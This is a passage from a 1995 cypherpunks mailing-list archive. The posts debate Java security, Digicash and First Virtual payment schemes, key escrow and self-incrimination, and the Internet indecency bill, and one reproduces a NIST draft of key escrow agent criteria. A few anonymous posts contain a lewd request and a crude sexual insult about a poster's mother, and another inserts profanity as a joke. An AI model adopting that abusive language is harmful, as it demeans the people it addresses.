didn't have the heart to tell him, that I generally avoid comp altogether, and stick primarily to the alt hierarchy -- especially alt.fan.alt.bigfoot. Strange as that might seem. Then again, I tried to have a bit of quiet time with Everett after Monday's Christmas party, but he never had any time for me. Too busy, I guess. He was running off to shoot snooker with some of the boys from Oracle, I think. I think that takes precedence over customer concerns. But the party was a smash. They even had a guy doing magic tricks. Shame I didn't bring any business cards with me to a social occassion. Guess, I just wasn't trained right. But I _did_ get a nifty Java T-shirt and a snazzy pin. So it was worth it. And the smoked salmon was an unexpected surprise in "It had better be Beef" Alberta. It was a very nice touch. I also tried to talk to a Sales Representative (grin) about this -- about Java security. Poor man. I think he was almost tearful, when he snapped at me, "Why don't you attack Microsoft instead??" So, I guess I might just do that, here. Does anyone besides me, see a sucker-punch in Microsoft's announced support for Java?? Support for a competitor's product?? I certainly do, especially from the way I saw the press presentations fly out over the airwaves. The media coverage seemed not to convey the "right" touch of sincerity. It seems like Gates wants to support and promote a product as being appropriate for something that it isn't suited for, and isn't designed for, while having his very own own fall-back position with VB. A sucker-punch. Or at least that was my perception of it. I don't know about anyone else, here. I wonder whether anyone from Sun smells a rat in Microsoft going this route. It seemed grossly out of character, for Microsoft. Major paradigm shifts such as this are truly unusual for large firms. Especially Microsoft's IETF comments. The frosting was just a little too sugary and thick, I think. > And all this from a software company that took over 10 years to make > their "operating system" do preemptive *anything*. It worries me when a company promotes another company's product heavily, while only embracing it partially. Then again, what would I know. I can get suckered into writing about Microsoft's puffery by a single tearful Sun salesman. Well, that, and some smoked salmon ... guess that rules me out for a security clearance, huh?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. > > But I guess I shouldn't complain. After all, VB has made me a pretty > decent living for the past year or so... > :: Request-Remailing-To: cypherpunks at toad.com Subject: Re: [NOISE] Re: FW: websurfer 4.6 From futplex at pseudonym.com Fri Dec 8 03:45:23 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 8 Dec 95 03:45:23 PST Subject: Still more on the Digicash protocol In-Reply-To: <199512071610.KAA16536@admin.starnet.net> Message-ID: <199512081146.GAA06511@opine.cs.umass.edu> Lucky (wearing his MTB hat) writes: > So when will the user pay with a wildcard coin? To make a payment to a party > that is (pseudo-) anonymous to the payor. That is, if the payor sends the > payment via anonymous remailer, in which case the messages should be > encrypted anyway. > > [Why a remailed message should be encrypted is left as an exercise to the > reader.] I don't think that's axiomatic. To be clear, I'm _not_ talking about encryption using the public keys of the remailers in a chain. I certainly do not wish to dispute the advantages of using those. But such encryption is just a form of link encryption. It doesn't prevent the final remailer (or anyone between the last remailer and the recipient) from altering the plaintext payor_id. It seems to me that end-to-end encryption is not significantly more important for remailed messages. Really, there's less information in the message when it emerges from the last remailer, so there's less to protect than in the ordinary case. Furthermore, it may not even be feasible, since I may not have a public key I can associate with my correspondent. -Futplex From nsb at nsb.fv.com Fri Dec 8 03:52:43 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 8 Dec 95 03:52:43 PST Subject: More FUD from First Virtual In-Reply-To: Message-ID: Excerpts from mail.limbo: 7-Dec-95 More FUD from First Virtual Douglas Barnes at communiti (1157*) > It is important to remember that Nat Borenstein is a principal It's Nathaniel, please. > in a company that very much does not want to see anonymous e-cash succeed. This is utter nonsense. If you check the cypherpunks archive, you'll find that a year ago I was talking about how to make Digicash succeed as a floating currency. Several people within FV thought it was inappropriate for me to be giving free advice to "competing" payment systems, but I think there's room for plenty of payment systems on the net, and that nobody is going to monopolize the market with a single payment scheme. If I didn't want anonymous cash to succeed, why would I waste my time explaining alternate models (not previously under discussion!) about how to make it succeed? I *am* skeptical about the extent to which anonymous cash *can* succeed, but in point of fact I'd like to help. I think society will be better off if one of the payment options is truly anonymous. I think that level of privacy will inevitably carry a high surcharge, however, for reasons that I keep pointing out and you keep ignoring. > Their extremely backwards technology cannot compete in > the long term with cryptography-based methods, and therefore they > are compelled to run around the country and on the Internet, bad- > mouthing cryptography and anonymity at every turn, while pointing > to some charity work for Phil Z. as a fig leaf to cover their > actions in this regard (sort of like Exxon building an artificial > reef and claiming to be friends of the environment.) Sticks and stones may hurt my bones, but I do feel an obligation to provide an explanation for anyone who hasn't been following Mr. Barnes' rantings over the last year. For reasons I really don't understand, Mr. Barnes seems to have a personal vendetta against First Virtual. That's fine, it's his right. But there are some facts he prefers to ignore, in favor of spreading misinformation and slurs: 1. Our "backwards technology" includes what may be the world's most sophisticated internet firewalls and email robots. We were the first people to connect the Internet to the financial networks (including, indirectly, the Federal Reserve) and have operated the system for over a year, with several breakin attempts every week, and nobody has even come close to breaking in. Internally, everyone in our company uses pgp extremely heavily, and I suspect that if you go to more "cryptography-oriented" companies you will NOT find that their CEO and marketing people know how to use PGP. They are, for the most part, all talk and no action when it comes to cryptography. We all use it every day, even the non-technical people. This has given us a lot of insights into the strengths and weaknesses of cryptography in the hands of non-technical people. [FYI, newcomers to this discussion, it's sentences like the last one -- which imply that, horror of horrors, there are actually *weaknesses* involved in the use of cryptography -- that Mr. Barnes refers to as "bad-mouthing cryptography." We call it common sense.] 2. Our support for Phil Zimmermann is based on long-term friendship and personal principles, and on the fact that our business relies critically on PGP. Phil is one of my personal heroes as far as network politics are concerned. He's also not the kind of person who would let himself be used for publicity purposes, and he's totally uninhibited about criticizing us when he disagrees with us. (Just ask him!) He's also given us some advice on the use of PGP in the next-generation FV system, which WILL use cryptography, but in a manner you don't expect, and with more secure key management than you'll find in any existing or publicly proposed payment system. > I have, on several occasions, refuted his "infinite liability" rant, > but it keeps on resurfacing. A few months ago, I wrote a short tech > note on why this claim doesn't hold water. I thought I might stretch > it into something longer, but other things have more urgently > grabbed my attention. Yes, you wrote this theoretical treatise and proposed it as a refutation to some specific arguments about Digicash. It wasn't relevant to the digicash argument, at least at the time, so I didn't pay a lot of attention. But basically, what your argument comes down to is that in the event of a catastrophe, users can be told they have to sacrifice their anonymity if they want to keep their cash. As I have said all along, the basic tradeoff is between anonymity and risk limitation in the event of disaster recovery. If the digital bank can, at its pleasure, tell you that your anonymity has been revoked unless you want to just say goodbye to your money, then I think the anonymity was a sham in the first place. (Who's using fig leafs here?) First Virtual transactions are also generally untraceable unlesss First Virtual decides (or is court-ordered) to trace them. At least we're up front about it and don't call that level of privacy "anonymity". Your solution to the problem -- that anonymous cash has infinite liability -- basically comes down to letting the bank make you stop being anonymous whenever it chooses. That's our solution, too. -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From fc at all.net Fri Dec 8 03:55:56 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 8 Dec 95 03:55:56 PST Subject: Java musings Message-ID: <9512081153.AA07233@all.net> Excellent musings. I just wanted to add something here. There is a fundamental issue with Java, and that is control: People in charge of organizations are responsible for what goes on within them. Without proper controls, it's impossible to carry out that responsibility. The people who want us to use Java are asking us to give up control over the programs run by our computers. They tell us to trust them because they say they have come up with a nearly fool-proof system for doing this safely. - They don't claim it's really secure, they only say it is harder to abuse than a C++ program. But nobody in their right mind would make it organizational policy to allow users to load and run C++ programs from over the Internet at the push of a button, and the removal of the particular things removed by Java are not adequate to justify this increased trust. - They won't back up their claims of security by assuming liability for resulting damages. Their liability disclaimers tell us they think their security is worth exactly nothing. They are asking us to bet control of our IT on a product that they take no responsibility for. - They don't even provide us with the ability to control their product in the way we control other purchased software we place into our environments. The inability to restrict which programs from which sources are run on our machines is a fundamental element of control. - Their product has been proven to be insecure in the past. Several examples of its insecurities have been demonstrated, and many more have been pointed out. There is essentially no counter point made by the Java supporters against these known defects. It seems to me that the loss of control resulting from the widespread introduction of Java would make it unacceptable to business. The use of Java as it exists today violates the policies of many businesses, and if their policies are ignored or changed to permit this to happen, it weakens the overall control structure of the organization. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From nobody at REPLAY.COM Fri Dec 8 05:13:59 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Dec 95 05:13:59 PST Subject: @v@ XXX Message-ID: <199512081315.OAA20949@utopia.hacktic.nl> Wall Street Journal, 8 Dec 1995 On-Line Society Angered by Plan to Curb Content By Jared Sandberg The latest move in Congress to curb "indecent" material on the Internet triggered outrage and scorn in cyberspace, as on-line users decried it as censorship and plotted ways to overturn it. "Welcome to the age of electronic book burning," said Craig Johnson, a consultant who worries that the term "indecent" could be applied to literary works, publichealth and medical exchanges, and serious discussion of AIDS and sexual behavior. "It's not only ridiculous - it's unfair, un-American and unconstitutional," said Eileen Kent, vice president of new media at Playboy Enterprises Inc. She finds it "incomprehensible" that the on-line version of Playboy could be deemed illegal while the printed magazine isn't. "Are they going to send me to jail and fine me a hundred grand because I put a Playmate on the Net?" she asked. If so, "then I'm quitting." House conferees hammering out a sweeping telecommunciations bill voted 17-16 on Wednesday to make it illegal for anyone to knowingly display indecent material that can be viewed by a minor, punishable by a $100,000 fine and up to two years in prison. Yesterday, critics tried to counter punch. The American Civil Liberties Union is preparing a court challenge on First Amendment grounds. The Center for Democracy and Technology, a cyberspace civil-liberties group, vows to do the same. On-line services drafted a letter of protest to House Speaker Newt Gingrich, who has opposed earlier attempts to impose restrictions on Internet fare. On-line advocates also are pushing for a new vote by the House conferees to define just what "indecency" means. They are hoping the 17-16 balance of the first vote is tenuous enough to allow them to ease the restrictions in defining the terms. Backed by the hectic lobbying efforts, Rep. Rick White of Washington state, who favors a less-restrictive approach, and allies have begun laboring to devise a limited definition of indecency that would be acceptable to civil libertarians and smut-fighters alike. Without a clearer, limited definition, the "indecency" standard faces the almost certain prospect of being struck down by the courts as unconstitutional, the White forces contend. On-line experts, moreover, argue the latest measure could create big problems and unintended consequences. If one 16- year-old zaps lewd fare to another, could the sender be imprisoned? If an adult makes a racy observation on an electronic bulletin board and a minor tracks it down and reads it, should the adult be punished? Last week, America Online Inc., in an effort to strike vulgarity from members' personal on-line "profiles," decided to strike all uses of the word "breast" - and thereby erased the biographies of scores of women who had breast cancer. AOL "responded to the climate of fear created by Congress," Mike Godwin, legal counsel for the Electronic Frontier Foundation. An AOL spokeswoman said the deletions were "a mistake on our part." Robert L. Smith, executive director of the Interactive Services Association, said such snafus could occur more and more as Internet access providers fret about whether their so-called content might be deemed indecent. "It's going to cause confusion, industry uncertainty and years of litigation, which will result in Congress not solving the problems they wanted to solve," Mr. Smith said. The crackdown effort, moreover, may be fruitless in a global computer network that reaches more than 150 countries. "Those American laws don't apply to me," said Patrick Groeneveld, a professor at Delft University in the Netherlands. Mr. Groeneveld, who once ran a popular Internet archive that included pornographic material, said Congress's efforts amount to U.S. "imperialism." "I didn't vote for America's congressmen," he said. "Legislators and some consumers don't understand the Internet," said Jerry Berman, executive director of the Center for Democracy and Technology. "So, it becomes an easy target for political posturing." -- Albert R. Karr contributed to this article. From mark at unicorn.com Fri Dec 8 05:45:48 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Fri, 8 Dec 95 05:45:48 PST Subject: Still more on the Digicash protocol Message-ID: On Thu, 7 Dec 1995, David A Wagner wrote: >Tough!? It's trivial for an active attacker, in the stream cipher case. >He just xors some bits: no clever cryptanalysis needed. (Or did you mean >it's tough to mount an active attack? I agree: that requires significant >knowledge or motivation.) Exactly.. once you have an active attack set up, it's trivial, but setting that up is quite hard. Mark From adam at homeport.org Fri Dec 8 06:11:45 1995 From: adam at homeport.org (Adam Shostack) Date: Fri, 8 Dec 95 06:11:45 PST Subject: Escrow expectations Message-ID: <199512081417.JAA03121@homeport.org> If there is no expectation of privacy when a key is escrowed with Bob, or my companies attorneys, then would there be any expectation of privacy under Clipper? Perhaps this is a powerful argument we should expect to have used against us... "Your honor, we argue that in escrowing his keys with the US government, the defendant should have known his communications could be listened to, and thus has no expectation of privacy." Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From nelson at crynwr.com Fri Dec 8 06:33:20 1995 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 8 Dec 95 06:33:20 PST Subject: Java musings In-Reply-To: <9512081153.AA07233@all.net> Message-ID: Frederick B. Cohen writes: > - They won't back up their claims of security by assuming liability > for resulting damages. Their liability disclaimers tell > us they think their security is worth exactly nothing. > They are asking us to bet control of our IT on a product > that they take no responsibility for. You haven't paid for liability claims. Why do you think you should be able to pursue them? I don't know of *any* software which is guaranteed. But now you have the opportunity to change that. Point out all of Java's problems, and then sell them a solution that fixes those problems. > - They don't even provide us with the ability to control their > product in the way we control other purchased software > we place into our environments. The inability to restrict > which programs from which sources are run on our machines > is a fundamental element of control. Again, sounds like something you could sell. Sell an HTTP proxy that only passes Java content if it's been signed by your company. And, of course, sell the matching signing service. There are no problems, really, just business opportunities. -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 voice | Flushing, NY. Not just a suburb, Potsdam, NY 13676 | +1 315 268 9201 FAX | it's a good idea in general. From twcook at cts.com Fri Dec 8 06:59:22 1995 From: twcook at cts.com (Tim Cook) Date: Fri, 8 Dec 95 06:59:22 PST Subject: (Fwd) General release of Open Encryptor interface for PGP Message-ID: Thanks Jeff, but aimnet.com is not an anonymous server. It dropped me as an unknown user. Thanks Tim Cook, Mindsource(tm) Librarian. "The World is a Database - Mindsource is the Search Engine." ______________________________________________________________ M I N D S O U R C E (TM) I N F O R M A T I O N N E T W O R K Send a blank Email to:mindsource at memo.net for full information Visit our W3 Site http://www.ultimate.org/mindsource/main.html D E S T I N E D FOR G L O B A L D I S T R I B U T I O N! Concept:"The Greatest Untapped Resource is Human Resource(TM)" Mindsource is a Reg. Trademark Copyright(c)1995 by Mindsource From bugs at ritz.mordor.com Fri Dec 8 07:29:39 1995 From: bugs at ritz.mordor.com (Mark Hittinger) Date: Fri, 8 Dec 95 07:29:39 PST Subject: Java musings Message-ID: <199512081530.KAA26089@ritz.mordor.com> I was starting to feel as if Java was going to be everything the hype was cracking it up to be. Then I saw Micro$oft jump on the Java bandwagon. Could Java already be dead? :-) Regards, Mark Hittinger Netcom/Dallas bugs at freebsd.netcom.com bugs at ritz.mordor.com From frissell at panix.com Fri Dec 8 07:29:40 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 8 Dec 95 07:29:40 PST Subject: Escrow expectations Message-ID: <2.2b8.32.19951208153041.00687120@panix.com> At 09:17 AM 12/8/95 -0500, Adam Shostack wrote: > "Your honor, we argue that in escrowing his keys with the US >government, the defendant should have known his communications could >be listened to, and thus has no expectation of privacy." If Clipper were mandated you might be able to resist a prosecution for "failure to file" keys or for double encrypting your transmissions if you could prove that you were transmitting illegal messages or evidence of a crime. Just as those who possess illegal weapons are not required to register them (self incrimination). You have to be sure your traffic is illegal though otherwise no protection. DCF "But if indecency is banned from the nets what will happen to the photos of Clinton's face posted on www.whitehouse.gov?" From bdavis at thepoint.net Fri Dec 8 07:47:50 1995 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 8 Dec 95 07:47:50 PST Subject: Is there a lawyer in the house? In-Reply-To: <199512080554.AAA05788@opine.cs.umass.edu> Message-ID: On Fri, 8 Dec 1995, Futplex wrote: > Black Unicorn writes: > > Yes. I have seen holdings which indicate that information given to an > > employer, where there was no obvious expection that it be kept > > confidential, estopped 4th amendment protections to its introduction when > > obtained without a warrant. > [...and...] > > Again, because of the nature of the relationship. There is an > > expectation that a conversation with an attorney is one of the most > > private exchanges you can engage in. As for rare exceptions, I'm not so > > sure I would term them rare. > > What happens if I disclose a key to my employer's corporate law firm ? The "key" here to the legal analysis is likely to be that the *employer's* law firm does not represent you and that the information disclosed is not privileged. The law firm's duty is to represent the corporation, not you. Certainly, such things as how you came to reveal it and what your position if the corporation could come into play, but in general, that firm is NOT your lawyer. > Does that clearly lie one way or the other, or would it likely hinge upon > the conditions under which I came to reveal the key ? > > -Futplex EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From nelson at crynwr.com Fri Dec 8 07:54:32 1995 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 8 Dec 95 07:54:32 PST Subject: Escrow expectations In-Reply-To: <2.2b8.32.19951208153041.00687120@panix.com> Message-ID: Duncan Frissell writes: > At 09:17 AM 12/8/95 -0500, Adam Shostack wrote: > > > "Your honor, we argue that in escrowing his keys with the US > >government, the defendant should have known his communications could > >be listened to, and thus has no expectation of privacy." > > If Clipper were mandated you might be able to resist a prosecution for > "failure to file" keys or for double encrypting your transmissions if you > could prove that you were transmitting illegal messages or evidence of a > crime. Just as those who possess illegal weapons are not required to > register them (self incrimination). You have to be sure your traffic is > illegal though otherwise no protection. To bring two cypherpunks threads together: That SHIT should be FUCK no DAMN problem ANAL whatsoever in a few SEX months. -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 voice | Flushing, NY. Not just a suburb, Potsdam, NY 13676 | +1 315 268 9201 FAX | it's a good idea in general. From hallam at w3.org Fri Dec 8 08:02:45 1995 From: hallam at w3.org (hallam at w3.org) Date: Fri, 8 Dec 95 08:02:45 PST Subject: the X.9 Electronic Payments ANSI standard In-Reply-To: <199512080630.WAA17998@infinity.c2.org> Message-ID: <9512081603.AA02769@zorch.w3.org> >The chair of the working group seems interesting >in including anonymous token-based payment systems in the standard, "I >see no reason, other than interest, for the group to avoid >non-account-based payment systems, to complement the account-based >payment systems that we are now in the process of standardizing." I see a damn good reason. X.9 is meant to be fast tracking credit card payment mechanisms. They are not meant to be going out solving every problem in the universe. They could attempt to standardise non account payment systems after they have done the problem they were given. Phill From nobody at REPLAY.COM Fri Dec 8 08:23:34 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Dec 95 08:23:34 PST Subject: Key Escrow Agent Criteria [Draft] Message-ID: <199512081619.RAA26774@utopia.hacktic.nl> [From NIST 12-08-95] The following draft discussion paper was distributed at the 12/5/95 meeting at NIST on draft criteria for 64-bit software key escrow exportability. DRAFT (12/1/95) Key Escrow Agent Criteria Introduction An often heard concern regarding key escrow encryption is that users of such encryption are vulnerable to abuse of the escrowed key by the escrow agents or others. Many have suggested that changes in the law are needed that specifically, criminalize any such abuses. We agree that such laws will be beneficial in deterring acts by anyone to access escrowed keys without authority or to undermine the integrity of the escrow key system. However, the availability of criminal prosecution is not alone sufficient. Key escrow agents must be selected not only with a view toward assuring the availability of escrowed keys for properly authorized government officials, but also to assure that the escrow agents have the commitment and means to protect the confidentiality and integrity of the keys they escrow and the escrow system. This will be particularly important if, as we expect will occur, some key escrow products will be designed such that the escrow agent could discern the identity of the user from the keys and other information that is escrowed with them. The following criteria were drafted with these principles in mind. We have not yet addressed conditions under which users can be the sole repository of the keys for their system. We recognize that some organizations or people do not want anybody but themselves to escrow their keys. However, since an important reason for escrowing is to preserve effective law enforcement, we must assure authorized officials can reliably and timely obtain access to escrowed keys through entities independent of the subject of electronic surveillance. Thus we welcome suggestions on how best to meet this range of interests. In considering the criteria appropriate for approving escrow agents, we considered whether the government needs to assure it has timely and reliable access when authorized and what key escrow encryption users would want to ensure that the escrowing of keys does not undermine their security. Of course, the government is also a user of key escrow encryption products and shares with other users an interest to ensure the integrity and security of the escrow system. Similarly, organizations interested in data recovery share the government's interest to have a system through which access to escrowed key is enabled under appropriate circumstances. With these considerations in mind, we developed criteria in two categories, "Escrow System Integrity and Security" and "Key Access Requirements." We expect that prospective escrow agents that meet criteria such as these would be considered as "approved" escrow agents for export purposes, to hold keys for government systems, etc. Note that keys and/or key components for devices that may process classified information shall be escrowed with escrow agent entities selected by the U.S. government, and that those escrow agent entities may be required to meet more stringent requirements. Escrow System Integrity and Security 1. Escrow agent entities shall devise and institutionalize policies, procedures, and mechanisms to ensure the confidentiality, integrity, and availability of key escrow related information. a. Escrow agent entities shall be designed and operated so that a failure by a single person, procedure, or mechanism does not compromise the confidentiality, integrity or availability of the key and/or key components (e.g., two person control of keys, split keys, etc.) b. Unencrypted escrowed key and/or key components that are stored and/or transmitted electronically shall be protected (e.g., via encryption) using approved means. c. Unencrypted escrowed key and/or key components stored and/or transferred via other media/methods shall be protected using approved means (e.g., safes). 2. Escrow agent entities shall ensure due form of escrowed key access requests and authenticate the requests for escrowed key and/or key components. 3. Escrow agent entities shall protect against disclosure of information regarding the identity of the person/ organization whose key and/or key components is requested, and the fact that a key and/or key component was requested or provided. 4. Escrow agent entities shall enter keys/key components into the escrowed key database immediately upon receipt. 5. Escrow agent entities shall ensure at least two copies of any key and/or key component in independent locations to help ensure the availability of such key and/or key components due to unforeseen circumstances. 6. Escrow agent entities that are certified by the U.S. government shall work with developers of key escrow encryption products and support a feature that allows products to verify to one another that the products' keys have been escrowed with a U.S.-certified agent. Key Access Requirements 7. An escrow agent entity shall employ one or more persons who possess a SECRET clearance for purposes of processing classified (e.g., FISA) requests to obtain keys and/or key components. 8. Escrow agent entities shall protect against unauthorized disclosure of information regarding the identity of the organization requesting the key or key components. 9. Escrow agent entities shall maintain data regarding all key escrow requests received, key escrow components released, database changes, system administration accesses, and dates of such events, for purposes of audit by appropriate government officials or others. 10. Escrow agent entities shall maintain escrowed keys and/or key components for as long as such keys may be required to decrypt information relevant to a law enforcement investigation. 11. Escrow agent entities shall provide key/key components to authenticated requests in a timely fashion and shall maintain a capability to respond more rapidly to emergency requirements for access. 12. Escrow agent entities shall possess and maintain a Certificate of Good Standing from the State of incorporation (or similar local/national authority). 13. Escrow agent entities shall provide to the U.S. government a Dun & Bradstreet/TRW number or similar credit report pointer and authorization. 14. Escrow agent entities shall possess and maintain an Errors & Omissions insurance policy. 15. Escrow agent entities shall provide to the U.S. government a written copy of, or a certification of the existence of a corporate security policy governing the key escrow agent entity's operation. 16. Escrow agent entities shall provide to the U.S. government a certification that the escrow agent will comply with all applicable federal, state, and local laws concerning the provisions of escrow agent entity services. 17. Escrow agent entities shall provide to the U.S. government a certification that the escrow agent entity will transfer to another approved escrow agent the escrow agent entity's equipment and data in the event of any dissolution or other cessation of escrow agent entity operations. 18. Escrow agent entities for products sold in the U.S. shall not be a foreign country or entity thereof, a national of a foreign country, or a corporation of which an alien is an officer or more than one-fourth of the stock which is owned by aliens or which is directly or indirectly controlled by such a corporation. Foreign escrow agent entities for products exported from the U.S. will be approved on a case by case basis as law enforcement and national security agreements can be negotiated. 19. Escrow agent entities shall provide to the U.S. government a certification that the escrow agent entity will notify the U.S. government in writing of any changes in the forgoing information. 20. Fulfillment of these and the other criteria are subject to periodic recertification. 12/1/95 ***************************************************** Elaine Frye Computer Security Division National Institute of Standards and Technology Bldg. 820, M.S. Room 426 Gaithersburg, MD 20899-0001 Voice: 301/975-2819 Fax: 301/948-1233 ***************************************************** From jamesd at echeque.com Fri Dec 8 08:30:07 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 8 Dec 95 08:30:07 PST Subject: (no subject) Message-ID: <199512081631.IAA15841@blob.best.net> At 05:25 PM 12/8/95, Nicholas Philp wrote: >WE WANT SOME PUSSY PICTURES Sorry: You only get them if Netscape continues to play coy on GAK --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Fri Dec 8 08:30:21 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 8 Dec 95 08:30:21 PST Subject: Netscape gives in to key escrow Message-ID: <199512081631.IAA15969@blob.best.net> At 02:14 AM 12/6/95 -0800, Jeff Weinstein wrote: > Our representative at the NIST meeting said > [GAK violates the rights of netscape's customers] > It should be up on the web site in a few days when he gets > back from DC. Still not there. When do you think it will come up. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From ashfaq at corp.cirrus.com Fri Dec 8 08:44:21 1995 From: ashfaq at corp.cirrus.com (Ashfaq Rasheed) Date: Fri, 8 Dec 95 08:44:21 PST Subject: Internet Stocks Message-ID: <199512081645.AA18510@sunstorm.corp.cirrus.com> Can this be made a regular feature on the list? It will be helpful to discuss on the Internet companies are doing in the stock market. Also it would be interesting to see if any startups have a strong product to survive in the market Thanks! Ashfaq From jya at pipeline.com Fri Dec 8 08:56:16 1995 From: jya at pipeline.com (John Young) Date: Fri, 8 Dec 95 08:56:16 PST Subject: BAR_tur Message-ID: <199512081657.LAA09805@pipe4.nyc.pipeline.com> 12-08-95. W$J: "Microsoft to Adopt Rival Tecnologies." Gates yawned, "its awakening a sleeping giant." "In a fight between a bear and an alligator, what determines the victor is the terrain," Andreesen shat. "What Microsoft just did is move onto our terrain." Ellison puked, "the Internet makes strange bedfellows." Schmidt shreiked, "Java moola." BAR_tur From anon-remailer at utopia.hacktic.nl Fri Dec 8 09:08:55 1995 From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request) Date: Fri, 8 Dec 95 09:08:55 PST Subject: No Subject Message-ID: <199512081710.SAA28344@utopia.hacktic.nl> > WE WANT SOME PUSSY PICTURES Can't help you there but, I do have some pictures of your mother having sex with a dog because she didn't want you to be an only child. From tcmay at got.net Fri Dec 8 09:34:26 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 8 Dec 95 09:34:26 PST Subject: Internet Stocks Message-ID: At 4:45 PM 12/8/95, Ashfaq Rasheed wrote: >Can this be made a regular feature on the list? It will be helpful to >discuss on the Internet companies are doing in the stock market. > >Also it would be interesting to see if any startups have a strong product to >survive in the market It won't be a regular feature by me, that's for sure! What others write is of course up to them. As I said in my message, I'd gotten some queries in e-mail, enough to indicate justification for one public message summarizing a bunch of points. Especially seeing as how these stocks have been very much in the news this week, and have been discussed on the list. But this is not "StockPunks," so I don't plan to comment unless something important comes up. Investors (and speculators) are well-served by various news sources, including the "Wall Street Journal," which also carries at least one great article per day, and sometimes even two. A bonus URL for you folks: http://www.ai.mit.edu/stocks.html --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jimbell at pacifier.com Fri Dec 8 09:50:28 1995 From: jimbell at pacifier.com (jim bell) Date: Fri, 8 Dec 95 09:50:28 PST Subject: More FUD from First Virtual Message-ID: At 06:51 AM 12/8/95 -0500, you wrote: >Excerpts from mail.limbo: 7-Dec-95 More FUD from First Virtual Douglas >Barnes at communiti (1157*) > >I *am* skeptical about the extent to which anonymous cash *can* succeed, What can stop it? What should stop it? >but in point of fact I'd like to help. I think society will be better >off if one of the payment options is truly anonymous. I think that >level of privacy will inevitably carry a high surcharge, however, for >reasons that I keep pointing out and you keep ignoring. Well, maybe I haven't been following those reasons, but I see little or no reason privacy should "inevitably carry a high surcharge." If the relevant encryptions had to be carried out with a pencil and a piece of paper, that claim would make sense, but remember, we've got MICROPROCESSORS on our side! I agree, I suppose, that there are definitely entities (read: governments) which would WANT to prevent the use of anonymous cash, but I view them more of an obstacle to be removed than a permanent bar. From tcmay at got.net Fri Dec 8 09:56:40 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 8 Dec 95 09:56:40 PST Subject: GAK and Self-Incrimination? Message-ID: Duncan Frissell wrote: >At 09:17 AM 12/8/95 -0500, Adam Shostack wrote: > >> "Your honor, we argue that in escrowing his keys with the US >>government, the defendant should have known his communications could >>be listened to, and thus has no expectation of privacy." > >If Clipper were mandated you might be able to resist a prosecution for >"failure to file" keys or for double encrypting your transmissions if you >could prove that you were transmitting illegal messages or evidence of a >crime. Just as those who possess illegal weapons are not required to >register them (self incrimination). You have to be sure your traffic is >illegal though otherwise no protection. Though I'm usually not too interested in smart-ass, overly cute, interpretations of legal loopholes--having been burned by the tax protestor arguments that the tax system is invalid because of definitions of money or that Ohio never entered the Union legally, or somesuch--this whole escrow thing has got me thinking. Given that GAK means one never knows if the government is listening, could a person claim protection against self-incrimination as a reason to not use GAK, and get away with it? (This is different from the phone system, which may also be tapped. The analogy would be the same if the government forced one to pick a telephone it could tap over one it could not, which so far has not been the case, but which soon may be if switching systems which are not compliant with Digital Telephony Act provisions are shut down.) Consider this hypo: I send an encrypted message to a partner in crime containing plans for future crimes and descriptions of past crimes. I don't GAK the message. The government prosecutes me under the Anti-Terrorism and Child Protection Act of 1997. My defense? That GAKKing the message would be tantamount to incriminating myself, which the Fifth Amendment protects me against. (The government might claim that this "tantamount" conclusion is specious, that only with a valid court order could they open my traffic. I would claim that this is suspect, citing the secret court (FISA) provisions, the possible back doors in GAK (64 bits known to be breakable, according to Clint Brooks of the government), and the general confusion about whether opening one message exposes past traffic to reading. I think my lawyers could make a convincing case that GAK will mean my words may be read by the government, via multiple options.) Comments? --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From support at marktwain.com Fri Dec 8 10:24:10 1995 From: support at marktwain.com (Mark Twain Ecash Support) Date: Fri, 8 Dec 95 10:24:10 PST Subject: Still more on the Digicash protocol Message-ID: <199512081825.MAA22557@admin.starnet.net> At 07:17 PM 12/7/95 -0500, you wrote: >Assume the attacker is not doing any traffic analysis. The problem is >that even then, the shop's identity (and product info, and payment amount, >and bank ID, etc.) are still sent *in the 